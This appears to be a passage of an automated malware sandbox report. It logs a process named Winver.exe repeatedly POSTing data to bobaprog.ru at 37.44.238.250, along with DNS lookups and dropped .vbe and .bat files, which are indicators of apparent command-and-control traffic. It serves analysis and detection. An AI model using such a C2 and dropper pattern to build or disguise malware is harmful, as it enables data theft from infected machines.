        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:33 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:34 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:36 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:37 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:38 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1748
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:39 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:40 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:41 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:43 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:44 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:45 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:46 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:47 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:48 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:11:50 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
      • flag-fr
        POST
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        Winver.exe
        Remote address:
        37.44.238.250:80
        Request
        POST /cpuserversqlTrafficUniversalUploads.php HTTP/1.1
        Content-Type: application/x-www-form-urlencoded
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
        Host: bobaprog.ru
        Content-Length: 1760
        Expect: 100-continue
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 11 Dec 2024 08:10:09 GMT
        Content-Type: text/html; charset=UTF-8
        Content-Length: 152
        Connection: keep-alive
      • flag-us
        DNS
        250.238.44.37.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        250.238.44.37.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        50.23.12.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        50.23.12.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        15.164.165.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        15.164.165.52.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        83.210.23.2.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        83.210.23.2.in-addr.arpa
        IN PTR
        Response
        83.210.23.2.in-addr.arpa
        IN PTR
        a2-23-210-83deploystaticakamaitechnologiescom
      • flag-us
        DNS
        172.214.232.199.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        172.214.232.199.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        43.229.111.52.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        43.229.111.52.in-addr.arpa
        IN PTR
        Response
      • 37.44.238.250:80
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        http
        Winver.exe
        337.8kB
        43.6kB
        461
        294

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200

      • 37.44.238.250:80
        http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php
        http
        Winver.exe
        2.4kB
        545 B
        7
        5

        HTTP Request

        POST http://bobaprog.ru/cpuserversqlTrafficUniversalUploads.php

        HTTP Response

        200
      • 8.8.8.8:53
        bobaprog.ru
        dns
        Winver.exe
        57 B
        73 B
        1
        1

        DNS Request

        bobaprog.ru

        DNS Response

        37.44.238.250

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\ESD\UST9UxLQoHNIIFaYLHo0xhIRlgCNcLzoLb106m2nL.vbe

        Filesize

        222B

      • C:\ESD\Winver.exe

        Filesize

        1.8MB

      • C:\ESD\bQzfgHSGdt2kLcLlkun74cHPltHDXr5Sp886hMeTP.bat

        Filesize

        57B

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Winver.exe.log

        Filesize

        1KB

      • C:\Users\Admin\AppData\Local\Temp\QXQBc8FYJD.bat

        Filesize

        193B
